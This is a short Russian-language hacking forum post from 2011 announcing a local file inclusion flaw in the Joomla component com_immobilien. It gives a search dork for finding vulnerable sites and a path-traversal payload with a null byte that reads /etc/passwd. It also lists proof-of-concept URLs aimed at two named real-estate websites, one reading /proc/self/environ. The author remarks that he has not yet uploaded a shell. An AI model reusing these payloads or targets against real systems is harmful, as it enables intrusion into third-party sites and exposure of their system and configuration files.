Показать сообщение отдельно

  #9  
Старый 10.04.2011, 16:39
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

LFI in Joomla component com_immobilien

Доброго времени суток, уважаемые форумчане.

Тип: LFI

Компонент: com_immobilien

Версия: Не знаю, тк шелл не залил

Найдена: 10.04.2011 by z0mbyak

Dork: inurl:"com_immobilien"

Vuln Code: Не искал)))

Link:

index.php?option=com_immobilien&controller=

Exploit:

../../../../../../../../../../../etc/passwd%00

PoC:

http://www.sundz-immobilien.de/index.php?option=com_immobilien&controller=../../../CREDITS.php%00

http://www.szaboimmobilien.de/index.php?option=com_immobilien&controller=../../../../../../../../../../../proc/self/environ%00

P.S Вроде не боян)
 
Ответить с цитированием